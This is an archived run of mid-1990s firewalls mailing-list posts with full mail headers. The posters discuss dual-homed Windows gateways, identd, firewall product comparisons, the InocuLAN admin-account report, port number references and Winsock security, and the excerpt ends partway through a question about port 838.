<199601311625.IAA09017@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > ---------- > From: firewalls-owner[SMTP:firewalls-owner@GreatCircle.COM] > Sent: 30 January 1996 10:56 > To: firewalls > Subject: MS-Windows PC as an email gateway > > > Hi, > > My company is looking at a quick way of getting on the Internet without > investing in a lot of hardware and engineering effort. One idea, which > has management interested, is to work with a local ISP to get a dedicated > line, either ISDN or 28.8, to tie a PC running MS-Windows or MS-Windows > NT to the Internet. > > This PC would be an FTP server and WWW server. This PC would only be > connected to our office network _after_ it had been disconnected from the > ISP connection. Thus, no need for a fire wall. (So we can transfer files > back and forth.) How do you intend to prevent the PC from being connected to the internet and to the internal net at the same time? Physical disconnection? (How do you prevent someone from physically connecting to both nets at once? the two?) Single card? How are you going to prevent interface messups and too much inconvenience from reconfiguring net links? Also if the PC is sometimes connected to the inside and sometimes connected to the outside I assume that information on both nets are on the machine at all times. Can time delay attacks be set up on the PC? (I don't know about DOS programming enough to really know if you can script or otherwise run that.) If you are going through the trouble of switching nets that are up on the PC and going over to the PC for surfing you might as well use sneaker net (floppies/tape/cd tranferring of information) and never connect the PC to the internal net. > As a short term solution is this seems pretty good. The only problem is > that we also want e-mail. Today we use UUCP every couple of hours, but > there is a big push to have immediate access to incoming and immediate > outbound email, but on the internal network. That sounds like you will need the net connected on both sides at the same time. The "I don't need a firewall because it is only connected on one side at a time" goes away. > > Is it possible to use MS-Windows or NT as an email-only gateway? I am > assuming we would need a second lan card or a router? > > What security issues should I look out for? I assume that not allowing > the PC to be a telnet server is a start and only exposing the internal > email server to the PC is also a good idea. How do you get the mail from the email server to the internal net? Once you have a link from your internet to your internal net the door is open. If you can't get the firewall right away then you should wait on the email, assuming the data on the internal net is something you need to protect. If the data is less valuable (to others) then the need to protect goes down. You have to weight the risks. -Rachelr From firewalls-owner Wed Feb 14 15:36:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA01240 for firewalls-outgoing; Wed, 14 Feb 1996 15:23:40 -0800 (PST) Received: from bronze.lcs.mit.edu (bronze.lcs.mit.edu [18.30.0.254]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA01235 for ; Wed, 14 Feb 1996 15:23:36 -0800 (PST) Received: by bronze.lcs.mit.edu (Sendmail 8.6.10/950531.CACTUS) id SAA13369; Wed, 14 Feb 1996 18:20:40 -0500 Date: Wed, 14 Feb 1996 18:20:40 -0500 Message-Id: <199602142320.SAA13369@bronze.lcs.mit.edu> From: *Hobbit* Subject: netSP / secure-net-gateway To: firewalls@greatcircle.com Reply-to: hobbit@avian.org Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Getting information about this product from IBM is right up there with pulling teeth, and a thorough rape of the raleigh web site didn't help. Anyone from the right group at IBM care to get back to me, in the interest of answering some fairly in-depth questions about this thing? _H* From firewalls-owner Wed Feb 14 16:40:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA03840 for firewalls-outgoing; Wed, 14 Feb 1996 16:38:40 -0800 (PST) Received: from han.hana.nm.kr (han.hana.nm.kr [128.134.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA03835 for ; Wed, 14 Feb 1996 16:38:31 -0800 (PST) Received: from saitgw.Sait.Samsung.Co.KR by han.hana.nm.kr (4.1/KUM-0.1) id AA23669; Thu, 15 Feb 96 09:44:00 KST Received: from noc.sait.samsung.co.kr. by saitgw.Sait.Samsung.Co.KR (4.1/SMI-4.1) id AA02391; Thu, 15 Feb 96 09:31:22 KST Received: from fiji.info.samsung.co.kr by noc.sait.samsung.co.kr. (8.6.9H1/SMI-SVR4) id JAA00840; Thu, 15 Feb 1996 09:45:46 +0900 Date: Thu, 15 Feb 1996 09:45:46 +0900 Message-Id: <199602150045.JAA00840@noc.sait.samsung.co.kr.> X-Sender: kes@coda.info.samsung.co.kr X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Phil Davidson From: Kang Eun-Seong Subject: Re: Firewall comparison chart??? Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 11:27 AM 96/02/13 GMT, you wrote: >Just wondering if anyone has seen a chart that compares >the various Firewall packages currently available. >The kind that lists which features are available >or not or the different packages. > >cheers >Phil > > Have you ever been to http://www.data.com/Lab_Tests/Firewalls.html? There are very helpful comparison data for some firewalls. ------------------------------------------------------------------- Kang, Eun-Seong Samsung Electronics Co, Ltd. kes@coda.info.samsung.co.kr San 14, Nongseo-Ri, Kihung-Eup, phone) +82-331-280-9425 Yongin-Kun, Kyungki-Do, Korea. ------------------------------------------------------------------- From firewalls-owner Wed Feb 14 19:10:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA09426 for firewalls-outgoing; Wed, 14 Feb 1996 18:44:49 -0800 (PST) Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id SAA09413 for ; Wed, 14 Feb 1996 18:44:41 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle.winternet.com (8.7.3/8.7.2) with ESMTP id UAA22466; Wed, 14 Feb 1996 20:43:13 -0600 (CST) Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id UAA29349; Wed, 14 Feb 1996 20:43:11 -0600 Posted-Date: Wed, 14 Feb 1996 20:43:11 -0600 Date: Wed, 14 Feb 1996 20:43:11 -0600 (CST) From: Ron DuFresne To: Chris Eastman cc: firewalls@GreatCircle.COM Subject: Re: tcpdump modifications In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris, There's a motif Xwindows add-on for tcpdump that you maybe looking for, I found and have a copy of the version for linux, and I think it had all the makefiles for a number of other *nix's. Claims it will also read sniffer files too. Let me know if you'd like me to send you a copy... Later, Ron DuFresne On Wed, 14 Feb 1996, Chris Eastman wrote: > I was told recently that there are several modifications to tcpdump > floating around out there, primarily one that is packaged with a 'video' > utility that will take captured packets and replay them according to time > stamp information (real time playback). Does anyone know of where one > might come up with these modifications and/or additional filters? I > checked ftp.ee.lbl.gov, and the only thing they support is the standard > tcpdump release. > > Thanks in advance, > > --chris > > %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% > %% Christopher Eastman %% Cable & Wireless, Inc %% > %% MDS Network Engineer %% 1919 Gallows Road %% > %% chris@cwi.net %% Vienna, VA 22182 %% > %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Wed Feb 14 20:40:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA15119 for firewalls-outgoing; Wed, 14 Feb 1996 20:24:04 -0800 (PST) Received: from bifrost.paladin.com (router.paladin.com [199.3.129.207]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA15105 for ; Wed, 14 Feb 1996 20:23:58 -0800 (PST) Received: (from mail@localhost) by bifrost.paladin.com (8.6.12/8.6.9) id XAA01062; Wed, 14 Feb 1996 23:22:25 -0500 Received: from router.paladin.com(199.3.129.207) by bifrost.paladin.com via smap (V1.3) id sma001060; Wed Feb 14 23:22:11 1996 Date: Wed, 14 Feb 1996 23:22:11 -0500 (EST) From: Chris Woods To: Kyle Amon cc: firewalls@GreatCircle.COM Subject: Re: port 113? In-Reply-To: <9601148243.AA824307224@jabil.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 13 Feb 1996, Kyle Amon wrote: > Is there any reason (other than the loss of remote user identification > services on my host) that I might _not_ want to disable identd? I think it's one of those "You scratch my back, I'll scratch yours" things. Identd is definitely an "administrator-friendly" protocol. Disabling identd will not be directly detrimental to your site, unless you have lots of IRC users and that is a service which your site policy provides. Some IRC channels do not allow users from hosts that do not have identd running properly (or at all). If every site were to disable identd, then many web servers and network-access monitoring tools would be "crippled" wrt logging. Chris Woods cjwoods@paladin.com Systems/Network Administrator vox 617-273-4226 Paladin Computing Solutions, Inc. http://www.paladin.com/ From firewalls-owner Thu Feb 15 01:25:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA25592 for firewalls-outgoing; Thu, 15 Feb 1996 01:20:36 -0800 (PST) Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id BAA25587 for ; Thu, 15 Feb 1996 01:20:31 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle.winternet.com (8.7.3/8.7.2) with ESMTP id DAA14868 for ; Thu, 15 Feb 1996 03:19:08 -0600 (CST) Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id DAA08476; Thu, 15 Feb 1996 03:19:08 -0600 Posted-Date: Thu, 15 Feb 1996 03:19:08 -0600 Date: Thu, 15 Feb 1996 03:19:07 -0600 (CST) From: Ron DuFresne To: firewalls@GreatCircle.COM Subject: article, pcweek: InocuLAN leaves NT servers open! Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk et. al., PCWEEK, feb., 12, vol 13 num. 13, page 8: ...While testing InocuLAN 1.01 for an upcoming review, PC Week Labs found that the product's installation routine created an NT administrator-level account for it's own use, with a preset password that has no expiration... Creating such an account is not unusual for network operating system product installs and is not ordinarily a problem. However, the InocuLAN password is unencrypted and could be discovered by anyone with a moderate measure of curiosity and skill... Later, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Thu Feb 15 02:31:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA27638 for firewalls-outgoing; Thu, 15 Feb 1996 02:16:12 -0800 (PST) Received: from gate.ggr.co.uk ([193.128.25.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA27622 for ; Thu, 15 Feb 1996 02:15:54 -0800 (PST) Received: from mailhub.ggr.co.uk (uk0x07.ggr.co.uk) by gate.ggr.co.uk; Thu, 15 Feb 1996 10:06:22 GMT Received: from ukwit01.ggr.co.uk (ukwit01.ggr.co.uk) by mailhub.ggr.co.uk; Thu, 15 Feb 1996 10:01:27 GMT Received: by ukwit01.ggr.co.uk (8.7.1/imd160294) id KAA26552; Thu, 15 Feb 1996 10:08:31 GMT From: "Lack Mr G M" Message-Id: <9602151008.ZM26550@ukwit01> Date: Thu, 15 Feb 1996 10:08:30 +0000 In-Reply-To: Les Carleton "The Secure Operating Systems Question" (Feb 13, 1:21pm) References: <31208d38.900440@158.152.1.72> X-Mailer: Z-Mail (3.2.0 26oct94 MediaMail) To: les@tracker.demon.co.uk, firewalls@greatcircle.com Subject: Re: The Secure Operating Systems Question Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I've recently had customers coming up more and more with the "Secured > operating system" question. That is ... what is the benefit of having a > specially secured operating system on a machine which no one is going to be > logging in to? Because, if it isn't "Secured" then some people *might* start logging into it! > 3) There are no login users (except root who's access is controlled by a > securid card or other secure password scheme). There is also the possibility of having only a few accounts on it, controlled by this same securid/secure password scheme, and only allowing root access by "/bin/su -" after a successful "personal" login. This adds personal accountability to root access. > The question is ... Is there any benefit in having an MLS or specially secured > operating system on the host or will a standard opsys meeting these criteria > do? Depends on your terminology. Is a Unix system with irrelevant/"dangerous" services removed a "specially secured" OS or a "standard" one? -- ----------- Gordon Lack ----------------- gml4410@ggr.co.uk ------------ The contents of this message *may* reflect my personal opinion. They are *not* intended to reflect those of my employer, or anyone else. From firewalls-owner Thu Feb 15 05:10:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA01602 for firewalls-outgoing; Thu, 15 Feb 1996 04:59:57 -0800 (PST) Received: from dialup.oar.net (dialup.oar.net [131.187.1.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA01597 for ; Thu, 15 Feb 1996 04:59:53 -0800 (PST) Received: from sun1plus.liebert.com for legg@sun1plus.liebert.com by dialup.oar.net (8.6.10/931123.1402) id HAA21179; Thu, 15 Feb 1996 07:56:01 -0500 Received: from td407 by sun1plus.liebert.com (5.0/SMI-SVR4) id AA12772; Thu, 15 Feb 1996 07:54:44 +0500 From: legg@sun1plus.liebert.com (Jim Legg) Received: by td407 (SMI-8.6) id DAA00975; Thu, 15 Feb 1996 03:02:11 -0500 Date: Thu, 15 Feb 1996 03:02:11 -0500 Message-Id: <199602150802.DAA00975@td407> To: cjwoods@Paladin.COM Subject: Re: port 113? Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > If every site were to disable identd, then many web servers and > network-access monitoring tools would be "crippled" wrt logging. > The reason that I didn't find the indent protocol is that it didn't seem to be implemented with Solaris 2.3 (Correct me if I'm wrong about this.) Also PC's don't run it; including the one that was the target in the original log snipped that I posted. -jim- From firewalls-owner Thu Feb 15 05:41:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA02359 for firewalls-outgoing; Thu, 15 Feb 1996 05:27:45 -0800 (PST) Received: from nexus.ptech.com (aegis.ptech.com [165.166.50.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA02345 for ; Thu, 15 Feb 1996 05:27:39 -0800 (PST) Received: from felix.ptech.com by nexus.ptech.com (5.x/Piedmont Technology Group) id AA24681; Thu, 15 Feb 1996 08:21:27 -0500 Date: Thu, 15 Feb 1996 08:21:26 -0500 Message-Id: <9602151321.AA24681@nexus.ptech.com> X-Sender: jnb@nexus.ptech.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Pascal.Trouvin@integralis.co.uk, gjose@mecx05.colesmyer.com.au, firewalls@GreatCircle.COM From: Jim Brown Subject: Re: Firewall-1 Version Comparison Sender: firewalls-owner@GreatCircle.COM Precedence: bulk version 2 also provides firewall to firewall encryption .... At 06:00 PM 2/14/96 +0000, Pascal.Trouvin@integralis.co.uk wrote: > >Attachment Converted: C:\SCRATCH\ATTACH\ReFirewa > > Firewall-1 from checkpoint > > version 1 had only filtering capabilities > > version 2 implements some users identification/authentification > schemes, address translation > > > regards > > pascal.trouvin@integralis.co.uk > From firewalls-owner Thu Feb 15 05:57:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA03013 for firewalls-outgoing; Thu, 15 Feb 1996 05:52:51 -0800 (PST) Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA02999; Thu, 15 Feb 1996 05:52:46 -0800 (PST) Message-Id: <199602151352.FAA02999@miles.greatcircle.com> Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA045452282; Thu, 15 Feb 1996 08:51:22 -0500 Date: Thu, 15 Feb 1996 08:51:22 -0500 From: gary flynn To: firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM Subject: Re: list of port numbers above 255 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Hi all > > Can anyone tell me if ther is a faq or rfc detailing port numbers above 255, > I have already downloaded rfc 1010. Is this the lastest rgc on assigned-numbers? > > Thanks > RFC1700 is the latest one I know about. From firewalls-owner Thu Feb 15 06:31:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA03827 for firewalls-outgoing; Thu, 15 Feb 1996 06:19:02 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA03822 for ; Thu, 15 Feb 1996 06:18:59 -0800 (PST) Received: from pferguso-pc.cisco.com (c1robo6.cisco.com [171.68.13.6]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id GAA21368; Thu, 15 Feb 1996 06:16:50 -0800 Message-Id: <199602151416.GAA21368@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 15 Feb 1996 09:17:33 -0500 To: "Jeffry L'H. Tank" From: Paul Ferguson Subject: Re: list of port numbers above 255 Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Did you try RFC-1700 [Assigned Numbers]? - paul At 07:32 AM 2/14/96 -0500, Jeffry L'H. Tank wrote: >Hi all > >Can anyone tell me if ther is a faq or rfc detailing port numbers above 255, >I have already downloaded rfc 1010. Is this the lastest rgc on assigned-numbers? > >Thanks > >Jeffry L'H. Tank >sysop VSE Corp. Internet Server > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Thu Feb 15 06:40:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA04170 for firewalls-outgoing; Thu, 15 Feb 1996 06:28:48 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA04165 for ; Thu, 15 Feb 1996 06:28:42 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id JAA28421; Thu, 15 Feb 1996 09:31:39 -0500 From: Adam Shostack Message-Id: <199602151431.JAA28421@homeport.org> Subject: Re: Private FTP / Mail To: JGambetti@msmail.radisys.com (Jesse Gambetti) Date: Thu, 15 Feb 1996 09:31:39 -0500 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <31224B01@msmail.radisys.com> from "Jesse Gambetti" at Feb 14, 96 12:49:00 pm X-Mailer: ELM [version 2.4 PL24 ME8b] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jesse Gambetti wrote: | I'm interested in what security risks a private FTP server for our employees | and sending MS Mail via internet might present. | | As far as the FTP server we would need to set it up in a way that our | employees could copy files onto it just as if it were a netware drive. Which | might mean running NFS on the servers. If the FTP server is internal only, you don't have a problem. If its also exposed to the internet, things get hairy, because you need IPX on it. This means that you have a multiprotocol box somewhere, and that machine needs to be tied down very tightly to prevent it from being a route into your IPX network from the IP side. (Note that the server doesn't need to be the multiprotocol box; you can have some other (preferably small, single purpose machine), act as a Netware server, and run a process on the FTP server that occaisonally pulled files off of the Netware machine.) As far as sending MS mail via the internet, you have the standard confidentiality problems and integrity/authentication problems, and you also have the possibility that someone will insert MS Macro viruses into your mail stream. (Sigh. Does Microsoft get kickbacks from the anti-virus industry?) -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Thu Feb 15 06:56:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA04298 for firewalls-outgoing; Thu, 15 Feb 1996 06:31:15 -0800 (PST) Received: from dropit.pgh.net (dropit.pgh.net [206.210.64.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA04283 for ; Thu, 15 Feb 1996 06:30:48 -0800 (PST) Received: from amanue.UUCP (uucp@localhost) by dropit.pgh.net (8.7.3/PGH.NET-01) with UUCP id JAA13455 for GreatCircle.COM!Firewalls; Thu, 15 Feb 1996 09:13:08 -0500 (EST) Received: by amanue.pgh.net (Smail3.1.28.1 #2) id m0tn43j-000FYhC; Thu, 15 Feb 96 08:49 WET Message-Id: From: jr@amanue.pgh.net (Jim Rosenberg) Subject: Re: MS-Windows PC as an email gateway To: Firewalls@GreatCircle.COM Date: Thu, 15 Feb 1996 08:49:18 -40962758 (EST) In-Reply-To: <199602150900.BAA24679@miles.greatcircle.com> from "firewalls-digest-owner@GreatCircle.COM" at Feb 15, 96 01:00:24 am X-Mailer: ELM [version 2.4 PL20] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rachel Rosencrantz writes: > > My company is looking at a quick way of getting on the Internet without > > investing in a lot of hardware and engineering effort. One idea, which > > has management interested, is to work with a local ISP to get a dedicated > > line, either ISDN or 28.8, to tie a PC running MS-Windows or MS-Windows > > NT to the Internet. > > > > This PC would be an FTP server and WWW server. This PC would only be > > connected to our office network _after_ it had been disconnected from the > > ISP connection. Thus, no need for a fire wall. (So we can transfer files > > back and forth.) > > How do you intend to prevent the PC from being connected to the internet > and to the internal net at the same time? Physical disconnection? (How > do you prevent someone from physically connecting to both nets at once? the > two?) Single card? How are you going to prevent interface > messups and too much inconvenience from reconfiguring net links? I'm not an expert on this subject, and probably shouldn't be posting here, but am hoping to further frame the questions, since I've also thought about this issue. In case anybody is thinking this only affects a small number of people, think again. You have a firewall? Do you have *any* MS-Windows clients? Do any of those machines have modems? Any adventurous users on any of these machines? These days, somebody can get a free floppy in the mail, double-click on an icon and woila, they're connected to the Net. So the issue of how to deal with connection to both the Net and one's internal network can *not* just be dealt with by a firewall, because anyone with a PPP connection and a modem is a potential back door around the firewall. (Unless I badly misunderstand ...) So back to the original question. It seems to me the simplest way to deal with this issue is using alternate Winsocks. The setup is a little tricky, but doable. You have one Winsock that knows how to talk to the internal LAN. It is set up for Ethernet (or whatever you're using) and *has no PPP* set up. The other Winsock has PPP set up and no Ethernet. I'm pretty sure Trumpet can be set up this way, and probably other versions of Winsock too. This isn't as safe as physically disconnecting from the Ethernet while talking over PPP, but gives a measure of safety that is probably good enough. There is the obvious issue here that you are trusting your PC user not to tamper with the dual Winsock setup. But beyond this, can anyone comment on any *technical* weaknesses in a dual Winsock approach? > Can time delay attacks be set up on the PC? The multiple Winsock solution obviously doesn't defend against this one. The scariest thing about a PC connected to the Net sometimes and one's internal net other times is the possibility of a Trojan that will wait til it's got a Net connection and then connect to bad guys. -- Jim Rosenberg http://www.well.com/user/jer/ CIS: 71515,124 WELL: jer Internet: jr@amanue.pgh.net From firewalls-owner Thu Feb 15 07:24:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA03819 for firewalls-outgoing; Thu, 15 Feb 1996 06:17:03 -0800 (PST) Received: from gauntlet-1.trusted.com (gauntlet-1.trusted.com [204.254.155.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA03814 for ; Thu, 15 Feb 1996 06:16:58 -0800 (PST) Received: by gauntlet-1.trusted.com; id JAA16302; Thu, 15 Feb 1996 09:22:46 -0500 Received: from vanidor.tis.com(192.94.214.98) by gauntlet-1.trusted.com via smap (V3.1) id xmad16291; Thu, 15 Feb 96 09:22:36 -0500 Message-Id: <2.2.16.19960215141104.21bf779a@pop.trusted.com> X-Sender: avolio@pop.trusted.com X-Mailer: Windows Eudora Pro Version 2.2 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 15 Feb 1996 09:11:04 -0500 To: Michael Brown , jeromie From: Frederick M Avolio Subject: RE: Gauntlet 3.1 Packet Filter? Cc: firewalls , sengle Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The Gauntlet Internet Firewall supports more than this. See the web page http://www.tis.com/docs/NetSec/NetSec.html for a jump off point to latest press release, glossie, and functional summary. This stream is starting to read like a marketing event. Fred >My understanding of Gauntlet(please help me out and correct me) is the >proxies it supports are: Telnet, FTP, SMTP, NNTP, HTTP,X11 ,and gopher. The >NSC product is not directly competing for internet firewall business, but >more for Secure VPN applications over the INternet, Frame Relay, SMDS, any >public based network you need to ensure your traffic is kept confidential. From firewalls-owner Thu Feb 15 07:25:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA04144 for firewalls-outgoing; Thu, 15 Feb 1996 06:26:08 -0800 (PST) Received: from relay2.smtp.psi.net (relay2.smtp.psi.net [38.8.188.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA04122 for ; Thu, 15 Feb 1996 06:25:56 -0800 (PST) Received: from vse1 by relay2.smtp.psi.net (8.6.12/SMI-5.4-PSI) id LAA07340; Mon, 12 Feb 1996 11:17:57 -0500 Received: from jeffs_winpc by vse1 (4.1/SMI-4.1) id AA07250; Thu, 15 Feb 96 09:20:07 EST Message-Id: <9602151420.AA07250@vse1> X-Sender: jtankf@vse1 X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 15 Feb 1996 09:20:25 -0500 To: firewalls@greatcircle.com From: Jeffry Tank Subject: winsock sercurity Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Date: Thu, 15 Feb 1996 07:18:44 -0500 >To: firewall >From: Jeffry Tank >Subject: winsock sercurity > >Hi all > >I currently am running a network with the following configuration; >A Sparc II server running SunOS 4.1.3, which is connected to a livingston IRX firewall router to the Internet. >The Sun is connected to a Novell 4.1 server through the AUI port on the concentrator with thinnet, >the Novell server is connected to the pc workstations with 10-baseT. The PC's are running WFWG with networking disabled. The Novell network is talking IPX only, both the PC's and server have no IP services >running. The PC's run clients for web, ftp, mail, gopher, etc, using winsock (trumpet in this case), using >LSL, OPKODI, PKTODI, and WINPKT shims. > >Question: Asumming that the Novell server and PC's are not running any IP based services, are they at risk of penitration thru the Sun server? I know that NCSA Telnet for DOS runs a FTP server in background unless disabled, ( it was not well documented !) and am wondering if anyone knows of this situation using any winsock, or winsock clients, freeware, shareware, or commercial? > >Thanks > >Jeff Tank >Sysop, VSE Corp. Internet Server > From firewalls-owner Thu Feb 15 07:51:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA04051 for firewalls-outgoing; Thu, 15 Feb 1996 06:24:48 -0800 (PST) Received: from netrixgw.netrix.com (netrixgw.netrix.com [192.246.152.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA04046 for ; Thu, 15 Feb 1996 06:24:43 -0800 (PST) Received: by netrixgw.netrix.com (Sendmail4.1/Netrix Master 7-13-94) id AA13504; Thu, 15 Feb 96 09:21:56 EST Date: Thu, 15 Feb 1996 09:21:53 -0500 (EST) From: "Ralph C. Wolman" To: Ron DuFresne Cc: firewalls@greatcircle.com Subject: Re: article, pcweek: InocuLAN leaves NT servers open! In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is *not* meant to start a mail war... and I'm sure starting a discussion about this is not appropriate for this group. However, since we have to put up with enough mis-information and partial information in the press, you should at least be fair and give the list *all* of the information. What you say is certainly printed in the article. However, there is an important additional piece of information you have left out. And I quote, "A version of InocuLAN that will prompt administrators for a domain password on installation will be available this week, according to Cheyenne officials. "Cheyenne, of Roslyn Heights, N.Y., can be reached at (800) 243-9462 or at http://www.cheyenne.com." Cheers, Ralph p.s. - I have no affiliation with Cheyenne or PC Week. ----- Ralph Wolman Netrix Corporation 13595 Dulles Technology Drive Herndon, VA. 22071 On Thu, 15 Feb 1996, Ron DuFresne wrote: > et. al., > > PCWEEK, feb., 12, vol 13 num. 13, page 8: > > ...While testing InocuLAN 1.01 for an upcoming review, PC Week Labs found > that the product's installation routine created an NT administrator-level > account for it's own use, with a preset password that has no expiration... > Creating such an account is not unusual for network operating system > product installs and is not ordinarily a problem. However, the InocuLAN > password is unencrypted and could be discovered by anyone with a moderate > measure of curiosity and skill... > > Later, > > > Ron DuFresne > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > "Cutting the space budget really restores my faith in humanity. It > eliminates dreams, goals, and ideals and lets us get straight to the > business of hate, debauchery, and self-annihilation." -- Johnny Hart > ***testing, only testing, and damn good at it too!*** > > OK, so you're a Ph.D. Just don't touch anything. > > > From firewalls-owner Thu Feb 15 07:52:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA04917 for firewalls-outgoing; Thu, 15 Feb 1996 06:47:34 -0800 (PST) Received: from mercury.chadwyck.co.uk (mercury.chadwyck.co.uk [193.119.229.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA04898 for ; Thu, 15 Feb 1996 06:47:13 -0800 (PST) From: David Worthington Date: Thu, 15 Feb 1996 14:45:30 GMT Message-Id: <199602151445.OAA13738@mercury.chadwyck.co.uk> Received: by mercury.chadwyck.co.uk (8.6.9) id OAA13738; Thu, 15 Feb 1996 14:45:30 GMT To: firewalls@GreatCircle.COM Subject: Port 838 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know what tcp port 838 is used for? In the following output from netstat, our print server (called "sunserver" for the purposes of this example) has a service listening on port 838. The PC (some-pc) is 